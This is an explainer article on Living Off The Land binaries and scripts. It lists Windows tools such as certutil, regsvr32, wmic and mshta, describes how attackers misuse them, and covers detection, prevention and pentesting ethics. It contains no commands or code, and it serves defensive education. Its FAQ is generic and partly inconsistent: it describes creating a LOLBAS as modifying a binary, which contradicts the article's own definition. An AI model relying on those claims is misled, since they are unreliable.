What is LOLBAS (Living Off The Land Binaries And Scripts)?

The acronym LOLBAS stands for a method that misuses existing programs on a computer, for example, programs of the operating system, for malicious functions, or for malware. The LOLBAS project collects information about usable binaries, scripts, or libraries and makes them publicly available on the Internet. Defending against such attacks on computers can be difficult.

What is LOLBAS (Living Off The Land Binaries And Scripts)?

LOLBAS is the abbreviation for “Living Off The Land Binaries And Scripts” and stands for a method of attack on computers. “Living Off The Land” literally means “feeding off nature” and describes the method quite well. Living Off The Land Binaries And Scripts are executable files, scripts, or libraries that already exist on a computer, are provided by the operating system itself, or come from trusted sources.

They can be misused for certain malicious functions. Malware code uses the resources “naturally” present on a computer, such as programs signed by a vendor or by the operating system.

The term “Living Of The Land” was coined by Christopher Campbell and Matt Graeber. The malicious activities often go undetected due to the LOL concept, as the executing programs are regular pre-installed system tools and applications. For example, Living Off The Land Binaries And Scripts can be used to download files, compile program codes, perform file operations or steal credentials undetected. On Windows systems, for example, powershell.exe or rundll32.exe are often misused.

The LOLBAS project initiated by Oddvar Moe exists on the Internet. It provides information about binaries, scripts, and libraries that can be used, for example, by a Red team as part of penetration tests.

The goal of the open-source project is to document all scripts, binaries, and libraries that can be used for the Living-Off-The-Land method. If certain binaries, scripts, or libraries meet the project’s requirements, the information is published on the Internet. A searchable list of LOLBins, LOLLibs, and LOLScripts is available. The project can be accessed via the link https://lolbas-project.github.io.

Criteria for LOLBAS scripts, libraries, and binaries.

To be considered relevant to the Living Off The Land Binaries And Scripts project, the scripts, libraries, or binaries must be present on the system by default or installable through trusted software vendors or open-source sources. In addition, they must provide unexpected functions that can be repurposed for attack purposes. Such functions include:

  • Executing program code or scripts
  • Compiling program code
  • Bypassing user account control
  • Reading network traffic or user activity
  • Side-loading or hijacking DLLs
  • Process memory dumping
  • Reading login credentials
  • File operations like file downloads and uploads
  What is a Trojan Horse?

How Does LOLBAS Work?

LOLBAS attacks work by using legitimate Windows binaries and scripts to carry out malicious activities. These tools are often already present on the victim’s computer and can be used by attackers to evade detection by security software.

For example, an attacker may use a LOLBAS technique to run a PowerShell script that is already present on the system to download and execute additional malicious code. Since PowerShell is a legitimate tool used by system administrators, it may not be flagged as suspicious by security software.

Similarly, the attacker could use a legitimate system tool like “wmic.exe” or “regsvr32.exe” to execute malicious code or to bypass security controls.

LOLBAS attacks are often used in conjunction with other techniques, such as social engineering or phishing, to gain initial access to the victim’s computer. Once the attacker has a foothold on the system, they can use LOLBAS techniques to escalate privileges, move laterally through the network, and carry out their malicious objectives.

Defending against LOLBAS attacks requires a multi-layered approach that includes strong access controls, regular system updates and patches, security awareness training for users, and the use of advanced security software that can detect and block suspicious activity.

Protection against LOLBAS attacks

Protection against LOLBAS attacks is difficult. Because the executing programs are tools internal to the operating system or software from trusted sources, the malicious actions often go undetected by standard antivirus and antimalware programs. Special precautions must be taken for protection. In some cases, these must be implemented by the operating system or by the software manufacturers themselves.

In addition, advanced, intelligent protection solutions can be used, which start at different points of the system to be monitored. For example, network traffic and the behavior of various processes are continuously monitored to identify anomalies.

Effective Ways To Prevent LOLBAS Attacks

Preventing LOLBAS attacks requires a multi-layered approach that includes both technical and non-technical measures. Here are some effective ways to prevent LOLBAS attacks:

  • Patch and update systems regularly: Keeping software and operating systems up to date can prevent attackers from exploiting known vulnerabilities in these systems.
  • Implement access controls: Limiting access to critical systems and sensitive data can prevent attackers from using LOLBAS techniques to escalate privileges or move laterally through the network.
  • Use advanced security software: Deploying security software that can detect and block suspicious activity, including the misuse of legitimate tools and binaries, can help prevent LOLBAS attacks.
  • Use security awareness training: Educating users about the risks of phishing, social engineering, and other common attack techniques can help prevent initial access to the system.
  • Monitor system activity: Regularly monitoring system activity for signs of suspicious activity can help detect and prevent LOLBAS attacks.
  • Implement a least-privilege policy: Restricting user privileges to only the necessary functions and tasks can prevent attackers from exploiting higher-level privileges.
  • Implement application whitelisting: Limiting the use of system tools and binaries to only those that are necessary for business purposes can prevent attackers from using them for malicious activities.

By implementing these measures, organizations can significantly reduce the risk of LOLBAS attacks and improve their overall security posture. It’s important to note that no single measure can completely prevent attacks, and a multi-layered approach is necessary for effective defense.

What Is Living Off the Land Attacks (LOTL)

LOTL Living off the land attacks refer to a type of cyberattack that uses legitimate tools and software already present on a victim’s computer to carry out malicious activities. Attackers use these tools and software to evade detection by security software, which may not flag them as suspicious because they are legitimate.

Living off the land attacks are often used in combination with other attack techniques, such as phishing or social engineering, to gain initial access to the victim’s system. Once the attacker has gained a foothold on the system, they can use LOTL techniques to escalate privileges, move laterally through the network, and carry out their malicious objectives.

  What is a Jailbreak?

Living off the land attacks can take many forms, including:

  • Use of legitimate system tools like PowerShell, WMI, and regsvr32.exe to execute malicious code.
  • Exploitation of legitimate applications, such as web browsers or Microsoft Office, to deliver malware.
  • Use of administrative tools like PsExec or remote desktop services to gain remote access to systems.
  • Use of scripting languages like VBScript or JavaScript to execute malicious code.
  • Use of legitimate cloud services like Dropbox or Google Drive to store and distribute malware.

Preventing LOTL attacks requires a multi-layered approach that includes strong access controls, regular system updates and patches, security awareness training for users, and the use of advanced security software that can detect and block suspicious activity.

By implementing these measures, organizations can significantly reduce the risk of Living off the land attacks and improve their overall security posture.

Examples of specific LOLBins, LOLLibs, and LOLScripts that have been documented by the LOLBAS project

The LOLBAS (Living Off The Land Binaries And Scripts) project is a community-driven initiative that aims to document various legitimate binaries, libraries, and scripts that can be used by attackers to evade detection and execute malicious actions on a compromised system. Here are some examples of specific LOLBins, LOLLibs, and LOLScripts that have been documented by the project:

LOLBins

  • regsvr32.exe: a legitimate binary used to register COM DLLs, but can be abused to execute arbitrary code by passing a malicious DLL as an argument.
  • schtasks.exe: a legitimate binary used to schedule tasks, but can be abused to execute arbitrary commands with SYSTEM privileges.
  • wmic.exe: a legitimate binary used to manage system settings and services, but can be abused to execute arbitrary commands remotely and exfiltrate data.

LOLLibs

  • mshtml.dll: a legitimate library used by Internet Explorer, but can be abused to execute arbitrary code by crafting HTML and JavaScript payloads.
  • clr.dll: a legitimate library used by .NET applications, but can be abused to execute arbitrary code by loading a malicious .NET assembly.

LOLScripts

  • PowerShell: a legitimate scripting language used by system administrators, but can be abused to execute arbitrary code and download and execute malicious payloads.
  • VBScript: a legitimate scripting language used by system administrators, but can be abused to execute arbitrary code and download and execute malicious payloads.
  • JavaScript: a legitimate scripting language used by web browsers, but can be abused to execute arbitrary code and perform various malicious actions.

It’s worth noting that these are just a few examples, and there are many other LOLBins, LOLLibs, and LOLScripts documented by the LOLBAS project.

Real-world instances of LOLBAS attacks and their consequences

There have been several real-world instances of attackers using LOLBAS techniques to carry out attacks and evade detection. Here are a few examples:

  • APT32 (OceanLotus): In 2019, this Vietnamese APT group was found to be using LOLBins and LOLScripts to evade detection. They used various built-in Windows tools like BITSAdmin, regsvr32, and PowerShell to download and execute malicious payloads, exfiltrate data, and perform other malicious actions on the victim’s systems.
  • DarkHotel: This advanced persistent threat group has been using LOLBins and LOLScripts since at least 2014. They have used built-in Windows tools like PowerShell, wmic, and netsh to download and execute malicious payloads, exfiltrate data, and perform other malicious actions on the victim’s systems.
  • FIN7: This financially motivated cybercrime group has been using LOLBins and LOLScripts since at least 2016. They have used built-in Windows tools like regsvr32, schtasks, and wmic to download and execute malicious payloads, exfiltrate data, and perform other malicious actions on the victim’s systems. They have also used LOLLibs like mshtml.dll to execute arbitrary code.

In all these cases, the use of LOLBAS techniques allowed the attackers to evade detection and carry out their attacks successfully. The consequences of these attacks can be severe, ranging from theft of sensitive data to disruption of critical systems and services. As such, it is important for organizations to be aware of these techniques and take appropriate measures to protect their systems and networks.

  What is a DDoS attack?

This includes implementing strong security controls, monitoring for suspicious activity, and training employees to recognize and respond to potential threats.

The difference between LOLBins and LOLScripts and their specific functions in an attack

  • LOLBins and LOLScripts are both techniques used by attackers to execute malicious actions on a victim’s system. However, they differ in their implementation and the types of tools used.
  • LOLBins refer to legitimate binaries or executables that are already present on the target system. These are tools that are built into the operating system or are commonly installed applications that are meant to perform legitimate functions. Attackers use LOLBins to avoid detection by security tools that may be monitoring for suspicious activity.
    By using a legitimate tool, the attacker can blend in with normal system activity and avoid raising alarms. To make use of a LOLBin, the attacker will often modify the arguments or parameters passed to the tool, or supply it with a malicious file or payload to execute. Some examples of commonly used LOLBins include regsvr32, wmic, and schtasks.
  • LOLScripts, on the other hand, are scripts or interpreted code that are written in scripting languages like PowerShell, VBScript, or Python. Like LOLBins, LOLScripts are also used by attackers to evade detection by security tools, but they provide more flexibility and control over the actions that are performed on the target system.
    LOLScripts can be used to execute a wide range of malicious actions, such as downloading and executing malicious payloads, modifying system settings, exfiltrating data, and more. To make use of a LOLScript, the attacker will typically write or modify a script to perform the desired actions, and then execute it on the target system.

While both LOLBins and LOLScripts are used to evade detection, LOLBins rely on modifying the arguments passed to legitimate tools to execute malicious code, while LOLScripts use interpreted code to perform a wider range of malicious actions.

How to identify LOLBAS techniques in network traffic and system logs

Identifying LOLBAS techniques in network traffic and system logs can be challenging, as these techniques often rely on legitimate tools and techniques that may not be immediately obvious as malicious. However, there are some indicators that can help identify suspicious activity that may be associated with LOLBAS techniques. Here are a few examples:

  • Network traffic: Look for network traffic that is associated with commonly used LOLBins or LOLScripts, such as wmic, schtasks, or PowerShell. This could include traffic to suspicious IP addresses or domains, or unusual traffic patterns that suggest data exfiltration or command and control (C2) communication.
  • Process monitoring: Keep an eye on process monitoring tools, such as Process Monitor, to identify any unusual behavior from commonly used LOLBins or LOLScripts. This could include unusual arguments or parameters passed to the tool, or attempts to access or modify system files or settings.
  • Logging: Enable logging on critical systems and applications, and monitor the logs for suspicious activity. This could include attempts to execute known LOLBins or LOLScripts, unusual user or application behavior, or attempts to access or modify sensitive data or settings.
  • Behavioral analysis: Use behavioral analysis tools, such as endpoint detection and response (EDR) systems, to identify suspicious behavior on endpoints. This could include attempts to execute unusual commands or scripts, or unusual network activity from a particular endpoint.
  • Threat intelligence: Keep up to date with the latest threat intelligence, such as indicators of compromise (IOCs) and known attack patterns associated with LOLBAS techniques. This can help identify suspicious activity that may be associated with known threats.

Identifying LOLBAS techniques requires a combination of technical expertise, threat intelligence, and proactive monitoring of network and system activity. By leveraging these resources, organizations can better identify and respond to potential threats associated with LOLBAS techniques.

  What Is a Keylogger? Understanding the Silent Spy

The history and evolution of LOLBAS attacks and their use in cybercrime

The concept of LOLBins (Living Off the Land Binaries) and LOLScripts (Living Off the Land Scripts) has been around for some time, but the term was popularized by the cybersecurity community in the mid-2010s. The idea behind LOLBAS attacks is to use legitimate tools and commands that are already present on the target system to execute malicious actions, rather than relying on traditional malware that can be detected by security tools.

LOLBAS attacks have become increasingly popular among cybercriminals in recent years, as they allow attackers to evade detection by security tools and blend in with normal system activity. Attackers can use built-in Windows tools like PowerShell, regsvr32, and wmic, as well as commonly installed applications like Microsoft Office and Adobe Reader, to execute malicious payloads and perform other malicious actions on the victim’s system. This makes it more difficult for security tools to detect and prevent the attack.

LOLBAS attacks are often used as part of a larger attack campaign, such as a phishing or spear-phishing attack, to gain initial access to a victim’s system. Once access is gained, the attacker can then use LOLBAS techniques to escalate privileges, move laterally through the network, and exfiltrate sensitive data.

The use of LOLBAS techniques in cybercrime has evolved over time. Initially, attackers focused on using built-in Windows tools to carry out attacks, but more recently, they have begun to use more sophisticated techniques, such as leveraging DLL hijacking vulnerabilities to execute arbitrary code, or using LOLScripts to bypass security controls and install malware on the victim’s system.

As a result of the increasing use of LOLBAS techniques in cybercrime, there has been a growing emphasis on the need for organizations to implement stronger security controls and monitoring mechanisms. This includes regular patching and updating of systems, implementing security tools like endpoint detection and response (EDR) systems and network traffic analysis (NTA) solutions, and providing regular cybersecurity training to employees.

By staying informed about the latest threats and taking proactive measures to mitigate them, organizations can better protect themselves against LOLBAS attacks and other cyber threats.

The role of artificial intelligence and machine learning in detecting and preventing LOLBAS attacks

Artificial intelligence (AI) and machine learning (ML) can play an important role in detecting and preventing LOLBAS attacks. These technologies can be used to identify patterns and anomalies in system and network activity that may be indicative of a LOLBAS attack. Here are a few ways in which AI and ML can be used to detect and prevent LOLBAS attacks:

  • Behavioral analysis: AI and ML algorithms can be trained to analyze normal system and network behavior, and to detect deviations from that behavior that may be indicative of a LOLBAS attack. For example, an algorithm may detect an unusual command being executed, or a file being accessed that has not been accessed before.
  • Predictive analytics: AI and ML algorithms can be used to analyze large volumes of data to identify patterns and trends that may indicate a potential LOLBAS attack. For example, an algorithm may detect a sudden increase in network traffic to a specific IP address or domain, or a large number of requests being made to a specific application.
  • Threat intelligence: AI and ML can be used to analyze threat intelligence feeds and other data sources to identify potential LOLBAS attacks. For example, an algorithm may analyze social media and dark web chatter to detect the use of specific LOLBAS techniques by threat actors.
  • Network traffic analysis: AI and ML can be used to analyze network traffic in real-time, and to identify anomalies that may be indicative of a LOLBAS attack. For example, an algorithm may detect unusual DNS requests or HTTP requests that may be associated with a C2 server.
  • Response automation: AI and ML can be used to automate responses to LOLBAS attacks, such as quarantining a specific endpoint or blocking network traffic to a specific IP address or domain.
  What is FIDO2 (Fast IDentity Online)? Revolutionizing Online Identity Verification

AI and ML can be used to detect and prevent LOLBAS attacks by analyzing patterns and anomalies in system and network activity, predicting potential threats, and automating responses to potential threats. By leveraging these technologies, organizations can better protect themselves against LOLBAS attacks and other cyber threats.

The ethical implications of using LOLBAS techniques in penetration testing and security research

The use of LOLBAS techniques in penetration testing and security research raises several ethical implications that should be carefully considered. Here are a few potential ethical concerns:

  • Unauthorized access: LOLBAS techniques often involve using legitimate tools and commands to carry out malicious actions. In a real-world scenario, this could be considered unauthorized access to a system or network. As such, it is important for penetration testers and security researchers to obtain proper authorization before conducting any testing that involves using LOLBAS techniques.
  • Harm to systems and data: If not executed properly, LOLBAS techniques can cause harm to the target system or network, potentially leading to data loss, system downtime, or other negative consequences. Penetration testers and security researchers should ensure that they fully understand the potential impact of using LOLBAS techniques before conducting any testing.
  • Legal implications: The use of LOLBAS techniques may violate laws and regulations related to computer crime, hacking, and data privacy. Penetration testers and security researchers should ensure that they are familiar with all applicable laws and regulations before conducting any testing that involves using LOLBAS techniques.
  • Informed consent: In some cases, the use of LOLBAS techniques may involve collecting or accessing sensitive data. As such, it is important to obtain informed consent from all parties involved in any testing that involves using LOLBAS techniques.
  • Reputation damage: The use of LOLBAS techniques may lead to negative publicity and damage to the reputation of the organization being tested. As such, it is important for penetration testers and security researchers to conduct testing in a professional and ethical manner, and to communicate with the organization being tested to minimize the risk of negative consequences.

The use of LOLBAS techniques in penetration testing and security research raises several ethical implications related to unauthorized access, potential harm to systems and data, legal implications, informed consent, and reputation damage. Penetration testers and security researchers should carefully consider these implications before using LOLBAS techniques, and should ensure that they conduct testing in a professional and ethical manner.

The potential impact of LOLBAS attacks on critical infrastructure and national security

LOLBAS attacks have the potential to cause significant harm to critical infrastructure and national security. Here are a few potential impacts:

  • Disruption of essential services: LOLBAS attacks could be used to disrupt essential services such as power, water, and transportation systems, causing widespread disruptions and potentially leading to public safety concerns.
  • Data theft or destruction: LOLBAS attacks could be used to steal or destroy sensitive data, potentially compromising national security or exposing confidential information.
  • Economic damage: Disruptions caused by LOLBAS attacks could have a significant impact on the economy, particularly if they affect key industries such as finance, energy, or transportation.
  • Public safety concerns: LOLBAS attacks could create public safety concerns if they affect critical infrastructure or other essential services. For example, if a LOLBAS attack caused a power outage in a hospital, it could lead to serious consequences for patients.
  • Cyber espionage: LOLBAS attacks could be used for cyber espionage, allowing threat actors to gain access to sensitive government or military information.

Given the potential impact of LOLBAS attacks on critical infrastructure and national security, it is essential for organizations and governments to take appropriate measures to prevent and detect these types of attacks. This may include implementing advanced security measures, training personnel on best practices for cybersecurity, and developing effective incident response plans.

  Security Awareness: Where Internal Weak Points Really Lie

Additionally, collaboration between public and private sector entities can help to enhance cybersecurity and mitigate the risk of LOLBAS attacks.

LOLBAS – Frequently Asked Questions

What is a LOLBins? What is an example of a LOLBin?

LOLBins, or Living Off The Land Binaries, refer to legitimate system binaries or executables that can be used by attackers to perform malicious actions on a compromised system. These binaries are often present on a system by default and are trusted by security software, making them an attractive option for attackers to evade detection.

Examples of LOLBins include utilities like PowerShell, Regsvr32, and WMIC. Attackers can use these tools to execute malicious code, download and execute additional payloads, or move laterally within a network.

What are the most used LOLBins?

Some of the most commonly used LOLBins include:

  • PowerShell – a command-line shell and scripting language that is used for system administration tasks but can also be used to execute malicious scripts or commands.
  • Certutil – a built-in Windows tool that is used to manage certificates, but can also be used to download and decode files from the internet.
  • Regsvr32 – a Windows utility used to register and unregister DLL files, but can also be used to execute malicious code.
  • Mshta – a Microsoft HTML Application Host that can be used to execute JavaScript and VBScript code.

It is important to note that LOLBins themselves are not malicious, and many legitimate administrators and security researchers use these tools for system administration and testing purposes.

However, attackers can abuse these tools to carry out malicious activities, and security professionals should be aware of these techniques to detect and mitigate potential threats.

What is the difference between LOLBAS and malware?

LOLBAS (Living Off The Land Binaries and Scripts) and malware are different in several ways. Malware is typically designed and used for malicious purposes, whereas LOLBAS refers to legitimate system binaries or scripts that can be used by both attackers and defenders.

LOLBAS can be used by attackers to evade detection and carry out malicious activities, but they can also be used by defenders for system administration and security testing purposes.

How can LOLBAS be used for good?

LOLBAS can be used for good when they are used by system administrators or security professionals for legitimate purposes, such as system administration tasks or penetration testing. By using these tools, administrators and professionals can improve the security posture of their systems and identify potential vulnerabilities.

How can LOLBAS be used for evil?

On the other hand, LOLBAS can be used for evil when they are used by attackers to carry out malicious activities, such as stealing data, executing code, or moving laterally within a network. Attackers can use these tools to evade detection and bypass security controls, making it more difficult for defenders to detect and respond to attacks.

How can I create my own LOLBAS?

Creating your own LOLBAS requires a deep understanding of system administration and programming. To create a LOLBAS, you would need to identify a legitimate system binary or script that can be used for your desired purpose and modify it to execute your own code. However, it is important to note that creating and using LOLBAS for malicious purposes is illegal and can result in criminal charges.

What are some of the best LOLBAS tools?

Some popular LOLBAS tools include PowerShell, WMIC, Regsvr32, and BITSAdmin. These tools are commonly used by attackers to carry out various malicious activities on a compromised system.

What are some of the best LOLBAS techniques?

Some of the best LOLBAS techniques include using fileless malware, leveraging legitimate system binaries or scripts, and using remote command execution tools like PsExec or WinRM. These techniques can help attackers evade detection and carry out malicious activities on a compromised system.

How can I learn more about LOLBAS?

To learn more about LOLBAS, you can research and read articles and blogs written by security professionals and researchers. There are also several online courses and training programs available that cover the use of LOLBAS in penetration testing and red teaming.

Are there any LOLBAS resources I can use?

There are several LOLBAS resources available, including repositories on GitHub and other online platforms that contain a wide variety of legitimate system binaries and scripts that can be used for system administration and security testing purposes.

However, it is important to note that some of these resources may contain malicious content, and users should exercise caution when downloading and using these tools.